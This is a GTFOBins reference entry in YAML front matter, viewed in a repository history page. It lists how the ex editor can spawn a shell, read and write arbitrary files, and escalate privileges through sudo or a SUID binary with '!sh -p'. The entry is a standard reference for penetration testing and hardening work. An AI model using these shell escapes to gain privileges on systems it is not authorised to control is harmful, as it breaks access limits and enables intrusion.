GTFOBins.github.io/_gtfobins/ex.md

29 lines
343 B
Markdown
Raw Normal View History

2020-11-12 14:21:00 +01:00
---
functions:
shell:
- code: |
ex
!sh
2020-11-12 14:21:00 +01:00
file-write:
- code: |
ex file_to_write
a
DATA
.
w
q
file-read:
- code: |
ex file_to_read
,p
q
sudo:
- code: |
sudo ex
!sh
suid:
2020-11-12 14:21:00 +01:00
- code: |
./ex
!sh -p
2020-11-12 14:21:00 +01:00
---